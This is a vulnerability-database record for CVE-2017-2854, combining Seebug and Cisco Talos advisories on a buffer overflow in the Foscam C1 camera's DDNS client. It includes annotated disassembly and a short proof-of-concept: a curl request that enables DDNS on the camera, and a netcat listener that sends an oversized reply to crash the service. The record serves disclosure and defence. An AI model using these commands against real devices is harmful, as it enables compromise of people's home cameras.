ID CVE-2017-2854 Type cve Reporter cve@mitre.org Modified 2018-12-13T15:11:00
Description
An exploitable buffer overflow vulnerability exists in the DDNS client used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.43. On devices with DDNS enabled, an attacker who is able to intercept HTTP connections will be able to fully compromise the device by creating a rogue HTTP server.
{"seebug": [{"lastseen": "2017-11-19T11:57:08", "description": "### Summary\r\nAn exploitable buffer overflow vulnerability exists in the DDNS client used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.43. On devices with DDNS enabled, an attacker who is able to intercept HTTP connections will be able to fully compromise the device by creating a rogue HTTP server.\r\n\r\n### Tested Versions\r\n* Foscam Indoor IP Camera C1 Series\r\n* System Firmware Version: 1.9.3.18\r\n* Application Firmware Version: 2.52.2.43\r\n* Plug-In Version: 3.3.0.26\r\n\r\n### Product URLs\r\nhttp://www.foscam.com/downloads/index.html\r\n\r\n### CVSSv3 Score\r\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')\r\n\r\n### Details\r\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the arm architecture. Foscam is considered one of the most common security cameras out on the current market.\r\n\r\nThe device can be configured to use a DDNS client to associate to a hostname the public IP address of the network hosting the camera. Clients have to be configured via the web interface by choosing between one of the supported DDNS providers together with a hostname, username and password. When the \"webService\" process starts it creates several threads, one of them is the \"DDNS update thread\", function `ThreadEntry_DdnsUpdate`. At [1] `r0` contains the seconds elapsed since the last loop execution. Every 10 seconds [2], the function retrieves the public IP address [3] and if it detects a difference the new IP is updated [4]. The function `getMyGloableIp` takes a pointer to the global structure at 0xa8074 as parameter [5]. This structure is located in the .bss segment and has a size of 140 bytes.\r\n```\r\n... ThreadEntry_DdnsUpdate\r\n...\r\n.text:00051BC4 09 00 50 E3 CMP R0, #9 ; [1]\r\n.text:00051BC8 00 00 A0 D3 MOVLE R0, #0\r\n.text:00051BCC 01 00 A0 C3 MOVGT R0, #1\r\n.text:00051BD0 00 00 50 E3 CMP R0, #0 ; [2]\r\n.text:00051BD4 12 00 00 0A BEQ loc_51C24\r\n.text:00051BD8 04 00 A0 E1 MOV R0, R4 ; [5]\r\n.text:00051BDC 8B FF FF EB BL getMyGloableIp ; [3]\r\n.text:00051BE0 00 00 50 E3 CMP R0, #0\r\n.text:00051BE4 0C 00 00 0A BEQ loc_51C1C\r\n...\r\n.text:00051C5C 04 00 A0 E1 MOV R0, R4\r\n.text:00051C60 CB FE FF EB BL sub_51794 ; [4]\r\n```\r\n\r\nThe function `getMyGloableIp`, checks if the configured hostname is not empty [6], then it retrieves the \"ddnsServer\" which is currently set [7]: this is a number between 0 and 5. 0 means that no DDNS is set [8], and retrieving the public IP address with DDNS number 3 is not supported [9]. Using this index, another function is called [10] that returns the \"ddnsServer\" instance (using a singleton pattern). The function responsible for retrieving the public IP address is then called [11], passing as arguments the \"ddnsServer\" instance and a buffer for storing the IP address [12]. This buffer starts at offset 0x58 in the global structure at 0xa8074. Note that for every provider a different function is used to retrieve the public IP address.\r\n```\r\n.text:00051A10 getMyGloableIp\r\n...\r\n.text:00051A20 00 40 A0 E1 MOV R4, R0\r\n...\r\n.text:00051A28 08 30 90 E5 LDR R3, [R0,#8]\r\n.text:00051A2C 00 30 D3 E5 LDRB R3, [R3]\r\n.text:00051A30 00 00 53 E3 CMP R3, #0 ; [6]\r\n.text:00051A34 34 00 00 1A BNE loc_51B0C\r\n...\r\n.text:00051A44 30 00 00 EA B loc_51B0C\r\n.text:00051A48\r\n.text:00051A48 loc_51A48\r\n.text:00051A48 30 10 94 E5 LDR R1, [R4,#0x30]\r\n.text:00051A4C 34 20 94 E5 LDR R2, [R4,#0x34]\r\n.text:00051A50 C8 30 9F E5 LDR R3, =sub_51D20\r\n.text:00051A54 BF F0 FF EB BL sub_4DD58 ; [10]\r\n.text:00051A58 58 50 84 E2 ADD R5, R4, #0x58\r\n.text:00051A5C 05 10 A0 E1 MOV R1, R5 ; [12]\r\n.text:00051A60 00 30 90 E5 LDR R3, [R0]\r\n.text:00051A64 00 30 93 E5 LDR R3, [R3]\r\n.text:00051A68 33 FF 2F E1 BLX R3 ; [11]\r\n...\r\n.text:00051B00 loc_51B00\r\n.text:00051B00 00 00 A0 E3 MOV R0, #0\r\n.text:00051B04 14 D0 8D E2 ADD SP, SP, #0x14\r\n.text:00051B08 30 80 BD E8 LDMFD SP!, {R4,R5,PC}\r\n.text:00051B0C\r\n.text:00051B0C loc_51B0C\r\n.text:00051B0C 0C 00 94 E5 LDR R0, [R4,#0xC] ; [7]\r\n.text:00051B10 03 00 50 E3 CMP R0, #3 ; [9]\r\n.text:00051B14 00 00 50 13 CMPNE R0, #0 ; [8]\r\n.text:00051B18 F8 FF FF 0A BEQ loc_51B00\r\n.text:00051B1C C9 FF FF EA B loc_51A48\r\n```\r\n\r\nWhen the DDNS provider in use is \"oray.com\" (DDNS number 1), the function `sub_4E460` is called. This function calls `sub_53808` [13] to establish a connection with \"ddns.oray.com\" on port 80. An HTTP request is built [14] and sent to the socket by calling `CDdnsClient__readyToSend` [15]. The response from the remote server is then retrieved using `CDdnsClient__readyToRead` [16], which will read at most 1024 bytes [17].\r\n```\r\n.text:0004E460 sub_4E460\r\n.text:0004E460\r\n.text:0004E460 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\r\n.text:0004E464 C1 DE 4D E2 SUB SP, SP, #0xC10\r\n.text:0004E468 0C D0 4D E2 SUB SP, SP, #0xC\r\n.text:0004E46C 00 40 A0 E1 MOV R4, R0\r\n.text:0004E470 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E474 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E478 01 50 A0 E1 MOV R5, R1\r\n...\r\n.text:0004E4A0 00 30 94 E5 LDR R3, [R4]\r\n.text:0004E4A4 03 1B 8D E2 ADD R1, SP, #0xC30+var_30\r\n.text:0004E4A8 10 C0 93 E5 LDR R12, [R3,#0x10]\r\n.text:0004E4AC 04 00 A0 E1 MOV R0, R4\r\n.text:0004E4B0 0C 10 81 E2 ADD R1, R1, #0xC ; \"ddns.oray.com\"\r\n...\r\n.text:0004E4BC 3C FF 2F E1 BLX R12 ; [13]\r\n...\r\n.text:0004E4D8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E4DC 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E4E0 D0 11 9F E5 LDR R1, =aGetCheckipHttp ; \"GET /checkip HTTP/1.1\\r\\n\"\r\n.text:0004E4E4 2C 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E4E8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E4EC 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E4F0 C4 11 9F E5 LDR R1, =aAccept ; \"Accept: */*\\r\\n\"\r\n.text:0004E4F4 28 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E4F8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E4FC 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E500 B8 11 9F E5 LDR R1, =aUserAgentFosca ; \"User-Agent: Foscam ipcam\\r\\n\"\r\n.text:0004E504 24 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E508 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E50C 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E510 AC 11 9F E5 LDR R1, =aHostDdns_oray_ ; \"Host: ddns.oray.com\\r\\n\"\r\n.text:0004E514 20 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E518 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E51C 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E520 A0 11 9F E5 LDR R1, =(asc_8D92C+2) ; \"\\r\\n\"\r\n.text:0004E524 1C 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E528 0C 00 8D E2 ADD R0, SP, #0xC30+dest\r\n.text:0004E52C 14 1C 9D E5 LDR R1, [SP,#0xC30+src]\r\n.text:0004E530 95 14 FF EB BL strcpy ; [14]\r\n.text:0004E534 00 30 94 E5 LDR R3, [R4]\r\n.text:0004E538 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E53C 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E540 14 70 93 E5 LDR R7, [R3,#0x14]\r\n.text:0004E544 10 6C 9D E5 LDR R6, [SP,#0xC30+var_20]\r\n.text:0004E548 FA 12 FF EB BL _ZNKSs6lengthEv\r\n.text:0004E54C 00 30 A0 E1 MOV R3, R0\r\n.text:0004E550 06 10 A0 E1 MOV R1, R6\r\n.text:0004E554 04 00 A0 E1 MOV R0, R4\r\n.text:0004E558 0C 20 8D E2 ADD R2, SP, #0xC30+dest\r\n.text:0004E55C 37 FF 2F E1 BLX R7 ; [15]\r\n...\r\n.text:0004E58C 01 3B A0 E3 MOV R3, #0x400 ; [17]\r\n.text:0004E590 3C FF 2F E1 BLX R12 ; [16]\r\n```\r\n\r\nThe function then ensures that the string \"200 OK\" is present anywhere in the response [18] and then finds the string \"Current IP Address:\" [19]. After this string the function expects to find the IP address. From this point every character is copied in the buffer passed to the function [20] using a loop, which will only exit when the character \"<\" [21] is found. Since the size of the destination buffer is not taken into account, a malicious HTTP server could exploit this vulnerability to write out of bounds.\r\n```\r\n.text:0004E594 00 00 50 E3 CMP R0, #0\r\n.text:0004E598 05 00 00 CA BGT loc_4E5B4\r\n...\r\n.text:0004E5B4 loc_4E5B4\r\n.text:0004E5B4 02 6B 8D E2 ADD R6, SP, #0xC30+var_430\r\n.text:0004E5B8 0C 60 86 E2 ADD R6, R6, #0xC\r\n.text:0004E5BC 06 00 A0 E1 MOV R0, R6\r\n.text:0004E5C0 0C 11 9F E5 LDR R1, =str.200OK ; [18]\r\n.text:0004E5C4 98 13 FF EB BL strstr\r\n.text:0004E5C8 00 00 50 E3 CMP R0, #0\r\n.text:0004E5CC 09 00 00 1A BNE loc_4E5F8\r\n...\r\n.text:0004E5F8 loc_4E5F8\r\n.text:0004E5F8 06 00 A0 E1 MOV R0, R6\r\n.text:0004E5FC E0 10 9F E5 LDR R1, =aCurrentIpAdd_1 ; \"Current IP Address:\"\r\n.text:0004E600 89 13 FF EB BL strstr ; [19]\r\n.text:0004E604 00 00 50 E3 CMP R0, #0\r\n.text:0004E608 01 00 00 1A BNE loc_4E614\r\n.text:0004E60C 09 00 00 EA B loc_4E638\r\n.text:0004E610\r\n.text:0004E610 loc_4E610\r\n.text:0004E610 01 30 45 E5 STRB R3, [R5,#-1] ; [20]\r\n.text:0004E614\r\n.text:0004E614 loc_4E614\r\n.text:0004E614 13 30 D0 E5 LDRB R3, [R0,#0x13]\r\n.text:0004E618 05 20 A0 E1 MOV R2, R5\r\n.text:0004E61C 3C 00 53 E3 CMP R3, #0x3C ; [21]\r\n.text:0004E620 01 50 85 E2 ADD R5, R5, #1\r\n.text:0004E624 01 00 80 E2 ADD R0, R0, #1\r\n.text:0004E628 F8 FF FF 1A BNE loc_4E610\r\n.text:0004E62C 00 50 A0 E3 MOV R5, #0\r\n.text:0004E630 00 50 C2 E5 STRB R5, [R2]\r\n.text:0004E634 03 00 00 EA B loc_4E648\r\n```\r\n\r\n\r\n### Timeline\r\n* 2017-07-17 - Vendor Disclosure\r\n* 2017-11-13 - Public Release", "published": "2017-11-14T00:00:00", "type": "seebug", "title": "Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability(CVE-2017-2854)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2854"], "modified": "2017-11-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96860", "id": "SSV:96860", "sourceData": "\n Prerequisite for this attack is that the device is setup to use the DDNS number 1. For this, the following query can be used:\r\n```\r\n$ sUsr=\"admin\"\r\n$ sPwd=\"\"\r\n$ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}\r\n&cmd=setDDNSConfig&isEnable=1&hostName=x&ddnsServer=1&user=x&password=x\"\r\n```\r\nTo trigger the vulnerability, an attacker needs to be able to intercept the device's HTTP requests and answer with a malicious payload. The following command will make the service crash.\r\n```\r\n$ sudo nc -l -p 80 <<< $( python2 -c 'print \"200 OK Current IP Address:\"+\"A\"*900+\"<\"' )\r\n```\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96860", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2020-07-01T21:25:15", "bulletinFamily": "info", "cvelist": ["CVE-2017-2854"], "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0357\n\n## Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability\n\n##### November 13, 2017\n\n##### CVE Number\n\nCVE-2017-2854\n\n### Summary\n\nAn exploitable buffer overflow vulnerability exists in the DDNS client used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.43. On devices with DDNS enabled, an attacker who is able to intercept HTTP connections will be able to fully compromise the device by creating a rogue HTTP server.\n\n### Tested Versions\n\nFoscam Indoor IP Camera C1 Series \nSystem Firmware Version: 1.9.3.18 \nApplication Firmware Version: 2.52.2.43 \nPlug-In Version: 3.3.0.26\n\n### Product URLs\n\n<http://www.foscam.com/downloads/index.html>\n\n### CVSSv3 Score\n\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-120: Buffer Copy without Checking Size of Input (\u2018Classic Buffer Overflow\u2019)\n\n### Details\n\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the arm architecture. Foscam is considered one of the most common security cameras out on the current market.\n\nThe device can be configured to use a DDNS client to associate to a hostname the public IP address of the network hosting the camera. Clients have to be configured via the web interface by choosing between one of the supported DDNS providers together with a hostname, username and password. When the \u201cwebService\u201d process starts it creates several threads, one of them is the \u201cDDNS update thread\u201d, function `ThreadEntry_DdnsUpdate`. At [1] `r0` contains the seconds elapsed since the last loop execution. Every 10 seconds [2], the function retrieves the public IP address [3] and if it detects a difference the new IP is updated [4]. The function `getMyGloableIp` takes a pointer to the global structure at 0xa8074 as parameter [5]. This structure is located in the `.bss` segment and has a size of 140 bytes.\n \n \n ... ThreadEntry_DdnsUpdate\n ...\n .text:00051BC4 09 00 50 E3 CMP R0, #9 ; [1]\n .text:00051BC8 00 00 A0 D3 MOVLE R0, #0\n .text:00051BCC 01 00 A0 C3 MOVGT R0, #1\n .text:00051BD0 00 00 50 E3 CMP R0, #0 ; [2]\n .text:00051BD4 12 00 00 0A BEQ loc_51C24\n .text:00051BD8 04 00 A0 E1 MOV R0, R4 ; [5]\n .text:00051BDC 8B FF FF EB BL getMyGloableIp ; [3]\n .text:00051BE0 00 00 50 E3 CMP R0, #0\n .text:00051BE4 0C 00 00 0A BEQ loc_51C1C\n ...\n .text:00051C5C 04 00 A0 E1 MOV R0, R4\n .text:00051C60 CB FE FF EB BL sub_51794 ; [4]\n \n\nThe function `getMyGloableIp`, checks if the configured hostname is not empty [6], then it retrieves the \u201cddnsServer\u201d which is currently set [7]: this is a number between 0 and 5. 0 means that no DDNS is set [8], and retrieving the public IP address with DDNS number 3 is not supported [9]. Using this index, another function is called [10] that returns the \u201cddnsServer\u201d instance (using a singleton pattern). The function responsible for retrieving the public IP address is then called [11], passing as arguments the \u201cddnsServer\u201d instance and a buffer for storing the IP address [12]. This buffer starts at offset 0x58 in the global structure at 0xa8074. Note that for every provider a different function is used to retrieve the public IP address.\n \n \n .text:00051A10 getMyGloableIp\n ...\n .text:00051A20 00 40 A0 E1 MOV R4, R0\n ...\n .text:00051A28 08 30 90 E5 LDR R3, [R0,#8]\n .text:00051A2C 00 30 D3 E5 LDRB R3, [R3]\n .text:00051A30 00 00 53 E3 CMP R3, #0 ; [6]\n .text:00051A34 34 00 00 1A BNE loc_51B0C\n ...\n .text:00051A44 30 00 00 EA B loc_51B0C\n .text:00051A48\n .text:00051A48 loc_51A48\n .text:00051A48 30 10 94 E5 LDR R1, [R4,#0x30]\n .text:00051A4C 34 20 94 E5 LDR R2, [R4,#0x34]\n .text:00051A50 C8 30 9F E5 LDR R3, =sub_51D20\n .text:00051A54 BF F0 FF EB BL sub_4DD58 ; [10]\n .text:00051A58 58 50 84 E2 ADD R5, R4, #0x58\n .text:00051A5C 05 10 A0 E1 MOV R1, R5 ; [12]\n .text:00051A60 00 30 90 E5 LDR R3, [R0]\n .text:00051A64 00 30 93 E5 LDR R3, [R3]\n .text:00051A68 33 FF 2F E1 BLX R3 ; [11]\n ...\n .text:00051B00 loc_51B00\n .text:00051B00 00 00 A0 E3 MOV R0, #0\n .text:00051B04 14 D0 8D E2 ADD SP, SP, #0x14\n .text:00051B08 30 80 BD E8 LDMFD SP!, {R4,R5,PC}\n .text:00051B0C\n .text:00051B0C loc_51B0C\n .text:00051B0C 0C 00 94 E5 LDR R0, [R4,#0xC] ; [7]\n .text:00051B10 03 00 50 E3 CMP R0, #3 ; [9]\n .text:00051B14 00 00 50 13 CMPNE R0, #0 ; [8]\n .text:00051B18 F8 FF FF 0A BEQ loc_51B00\n .text:00051B1C C9 FF FF EA B loc_51A48\n \n\nWhen the DDNS provider in use is \u201coray.com\u201d (DDNS number 1), the function `sub_4E460` is called. This function calls `sub_53808` [13] to establish a connection with \u201cddns.oray.com\u201d on port 80. An HTTP request is built [14] and sent to the socket by calling `CDdnsClient__readyToSend` [15]. The response from the remote server is then retrieved using `CDdnsClient__readyToRead` [16], which will read at most 1024 bytes [17].\n \n \n .text:0004E460 sub_4E460\n .text:0004E460\n .text:0004E460 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\n .text:0004E464 C1 DE 4D E2 SUB SP, SP, #0xC10\n .text:0004E468 0C D0 4D E2 SUB SP, SP, #0xC\n .text:0004E46C 00 40 A0 E1 MOV R4, R0\n .text:0004E470 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E474 04 00 80 E2 ADD R0, R0, #4\n .text:0004E478 01 50 A0 E1 MOV R5, R1\n ...\n .text:0004E4A0 00 30 94 E5 LDR R3, [R4]\n .text:0004E4A4 03 1B 8D E2 ADD R1, SP, #0xC30+var_30\n .text:0004E4A8 10 C0 93 E5 LDR R12, [R3,#0x10]\n .text:0004E4AC 04 00 A0 E1 MOV R0, R4\n .text:0004E4B0 0C 10 81 E2 ADD R1, R1, #0xC ; \"ddns.oray.com\"\n ...\n .text:0004E4BC 3C FF 2F E1 BLX R12 ; [13]\n ...\n .text:0004E4D8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E4DC 04 00 80 E2 ADD R0, R0, #4\n .text:0004E4E0 D0 11 9F E5 LDR R1, =aGetCheckipHttp ; \"GET /checkip HTTP/1.1\\r\\n\"\n .text:0004E4E4 2C 12 FF EB BL _ZNSspLEPKc\n .text:0004E4E8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E4EC 04 00 80 E2 ADD R0, R0, #4\n .text:0004E4F0 C4 11 9F E5 LDR R1, =aAccept ; \"Accept: */*\\r\\n\"\n .text:0004E4F4 28 12 FF EB BL _ZNSspLEPKc\n .text:0004E4F8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E4FC 04 00 80 E2 ADD R0, R0, #4\n .text:0004E500 B8 11 9F E5 LDR R1, =aUserAgentFosca ; \"User-Agent: Foscam ipcam\\r\\n\"\n .text:0004E504 24 12 FF EB BL _ZNSspLEPKc\n .text:0004E508 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E50C 04 00 80 E2 ADD R0, R0, #4\n .text:0004E510 AC 11 9F E5 LDR R1, =aHostDdns_oray_ ; \"Host: ddns.oray.com\\r\\n\"\n .text:0004E514 20 12 FF EB BL _ZNSspLEPKc\n .text:0004E518 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E51C 04 00 80 E2 ADD R0, R0, #4\n .text:0004E520 A0 11 9F E5 LDR R1, =(asc_8D92C+2) ; \"\\r\\n\"\n .text:0004E524 1C 12 FF EB BL _ZNSspLEPKc\n .text:0004E528 0C 00 8D E2 ADD R0, SP, #0xC30+dest\n .text:0004E52C 14 1C 9D E5 LDR R1, [SP,#0xC30+src]\n .text:0004E530 95 14 FF EB BL strcpy ; [14]\n .text:0004E534 00 30 94 E5 LDR R3, [R4]\n .text:0004E538 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E53C 04 00 80 E2 ADD R0, R0, #4\n .text:0004E540 14 70 93 E5 LDR R7, [R3,#0x14]\n .text:0004E544 10 6C 9D E5 LDR R6, [SP,#0xC30+var_20]\n .text:0004E548 FA 12 FF EB BL _ZNKSs6lengthEv\n .text:0004E54C 00 30 A0 E1 MOV R3, R0\n .text:0004E550 06 10 A0 E1 MOV R1, R6\n .text:0004E554 04 00 A0 E1 MOV R0, R4\n .text:0004E558 0C 20 8D E2 ADD R2, SP, #0xC30+dest\n .text:0004E55C 37 FF 2F E1 BLX R7 ; [15]\n ...\n .text:0004E58C 01 3B A0 E3 MOV R3, #0x400 ; [17]\n .text:0004E590 3C FF 2F E1 BLX R12 ; [16]\n \n\nThe function then ensures that the string \u201c200 OK\u201d is present anywhere in the response [18] and then finds the string \u201cCurrent IP Address:\u201d [19]. After this string the function expects to find the IP address. From this point every character is copied in the buffer passed to the function [20] using a loop, which will only exit when the character \u201c<\u201d [21] is found. Since the size of the destination buffer is not taken into account, a malicious HTTP server could exploit this vulnerability to write out of bounds.\n \n \n .text:0004E594 00 00 50 E3 CMP R0, #0\n .text:0004E598 05 00 00 CA BGT loc_4E5B4\n ...\n .text:0004E5B4 loc_4E5B4\n .text:0004E5B4 02 6B 8D E2 ADD R6, SP, #0xC30+var_430\n .text:0004E5B8 0C 60 86 E2 ADD R6, R6, #0xC\n .text:0004E5BC 06 00 A0 E1 MOV R0, R6\n .text:0004E5C0 0C 11 9F E5 LDR R1, =str.200OK ; [18]\n .text:0004E5C4 98 13 FF EB BL strstr\n .text:0004E5C8 00 00 50 E3 CMP R0, #0\n .text:0004E5CC 09 00 00 1A BNE loc_4E5F8\n ...\n .text:0004E5F8 loc_4E5F8\n .text:0004E5F8 06 00 A0 E1 MOV R0, R6\n .text:0004E5FC E0 10 9F E5 LDR R1, =aCurrentIpAdd_1 ; \"Current IP Address:\"\n .text:0004E600 89 13 FF EB BL strstr ; [19]\n .text:0004E604 00 00 50 E3 CMP R0, #0\n .text:0004E608 01 00 00 1A BNE loc_4E614\n .text:0004E60C 09 00 00 EA B loc_4E638\n .text:0004E610\n .text:0004E610 loc_4E610\n .text:0004E610 01 30 45 E5 STRB R3, [R5,#-1] ; [20]\n .text:0004E614\n .text:0004E614 loc_4E614\n .text:0004E614 13 30 D0 E5 LDRB R3, [R0,#0x13]\n .text:0004E618 05 20 A0 E1 MOV R2, R5\n .text:0004E61C 3C 00 53 E3 CMP R3, #0x3C ; [21]\n .text:0004E620 01 50 85 E2 ADD R5, R5, #1\n .text:0004E624 01 00 80 E2 ADD R0, R0, #1\n .text:0004E628 F8 FF FF 1A BNE loc_4E610\n .text:0004E62C 00 50 A0 E3 MOV R5, #0\n .text:0004E630 00 50 C2 E5 STRB R5, [R2]\n .text:0004E634 03 00 00 EA B loc_4E648\n \n\n### Exploit Proof-of-Concept\n\nPrerequisite for this attack is that the device is setup to use the DDNS number 1. For this, the following query can be used:\n \n \n ```\n $ sUsr=\"admin\"\n $ sPwd=\"\"\n $ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}\n &cmd=setDDNSConfig&isEnable=1&hostName=x&ddnsServer=1&user=x&password=x\"\n ```\n \n\nTo trigger the vulnerability, an attacker needs to be able to intercept the device\u2019s HTTP requests and answer with a malicious payload. The following command will make the service crash.\n \n \n ```\n $ sudo nc -l -p 80 <<< $( python2 -c 'print \"200 OK Current IP Address:\"+\"A\"*900+\"<\"' )\n ```\n \n\n### Timeline\n\n2017-07-17 - Vendor Disclosure \n2017-11-13 - Public Release\n\n##### Credit\n\nDiscovered by Claudio Bozzato and another member of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0358\n\nPrevious Report\n\nTALOS-2017-0448\n", "edition": 6, "modified": "2017-11-13T00:00:00", "published": "2017-11-13T00:00:00", "id": "TALOS-2017-0357", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0357", "title": "Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability", "type": "talos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-11-13T17:34:56", "bulletinFamily": "blog", "cvelist": ["CVE-2017-2854", "CVE-2017-2855", "CVE-2017-2856", "CVE-2017-2857", "CVE-2017-2872", "CVE-2017-2873", "CVE-2017-2874", "CVE-2017-2875", "CVE-2017-2876", "CVE-2017-2877", "CVE-2017-2878", "CVE-2017-2879"], "description": "<i>These vulnerabilities were discovered by Claudio Bozzato of Cisco Talos.</i><br /><br /><h2 id=\"h.zay7s6txaomh\">Executive Summary</h2><br />The Foscam C1 Indoor HD Camera is a network-based camera that is marketed for use in a variety of applications, including use as a home security monitoring device. Talos recently identified several vulnerabilities present in these devices, and worked with Foscam to develop fixes for them, which we published the details for in a blog post <a href=\"http://blog.talosintelligence.com/2017/06/foscam-vuln-details.html\">here</a>. In continuing our security assessment of these devices, Talos has discovered additional vulnerabilities. In accordance with our responsible disclosure policy, Talos has worked with Foscam to ensure that these issues are resolved and that a firmware update is made available for affected customers. These vulnerabilities could be leveraged by an attacker to achieve remote code execution on affected devices, as well as upload rogue firmware images to the devices, which could result in an attacker being able to completely take control of the devices.<br /><a name='more'></a><h3>Foscam IP Video Camera webService DDNS Client Code Execution Vulnerabilities</h3><br />Foscam C1 Indoor HD Cameras are vulnerable to several buffer overflow vulnerabilities on devices with Dynamic DNS (DDNS) enabled. On devices with DDNS enabled, an attacker could leverage a rogue HTTP server to exploit these vulnerabilities. When the device boots, a thread is spawned that routinely checks the configured DDNS server for updates or changes to the IP address associated with the DDNS server. In cases where the device is configured to use the DDNS, the device will send requests to the DDNS server and write the associated responses to the buffer, without performing proper bounds checking. This could be exploited by an attacker controlled server returning a specially crafted response larger than the allocated buffer, resulting in an overflow that could be leveraged to obtain remote code execution on affected devices. The following advisories and CVEs are associated with this vulnerability.<br /><br /><ul><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0357/\">Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability (</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0357/\">TALOS-2017-0357</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0357/\"> / CVE-2017-2854)</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0358/\">Foscam IP Video Camera webService 3322.net DDNS Client Code Execution Vulnerability (</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0358/\">TALOS-2017-0358</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0358/\"> / CVE-2017-2855)</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0359/\">Foscam IP Video Camera webService dyndns.com DDNS Client Code Execution Vulnerability (</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0359/\">TALOS-2017-0359</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0359/\"> / CVE-2017-2856)</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0360/\">Foscam IP Video Camera webService 9299.org DDNS Client Code Execution Vulnerability (</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0360/\">TALOS-2017-0360</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0360/\"> / CVE-2017-2857)</a></li></ul><h3>Foscam IP Video Camera CGIProxy.fcgi Firmware Upgrade Unsigned Image Vulnerability (TALOS-2017-0379 / CVE-2017-2872)</h3><br />Foscam C1 HD Indoor cameras allow for firmware upgrades to be performed via the web management interface present on the devices. These devices lack sufficient security verification of firmware images provided by users. This functionality and lack of verification could be leveraged by an attacker to upload and execute custom firmware images on affected devices. In order to perform the firmware upgrade process, an attacker would require access to an account with administrative privileges on the device. TALOS-2017-0379 has been assigned CVE-2017-2872. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0379/\">here</a>.<br /><h3>Foscam IP Video Camera CGIProxy.fcgi SoftAP Configuration Command Injection Vulnerability (TALOS-2017-0380 / CVE-2017-2873)</h3><h3> </h3>Foscam C1 HD Indoor cameras provide the ability to configure a SoftAP using the web management interface. The SoftAP configuration facilitates connecting to the device over wireless to perform initial device setup and configuration. These devices are vulnerable to a command injection vulnerability present in the 'devMng' binary that is reachable via the 'setSoftApConfig' command. This vulnerability could be leveraged to execute arbitrary operating system commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the affected device. TALOS-2017-0380 has been assigned CVE-2017-2873. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0380/\">here</a>.<br /><h3>Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0000 Information Disclosure Vulnerability (TALOS-2017-0381 / CVE-2017-2874)</h3><br />Foscam C1 HD Indoor cameras allow device-to-device communications over UDP/10000 and 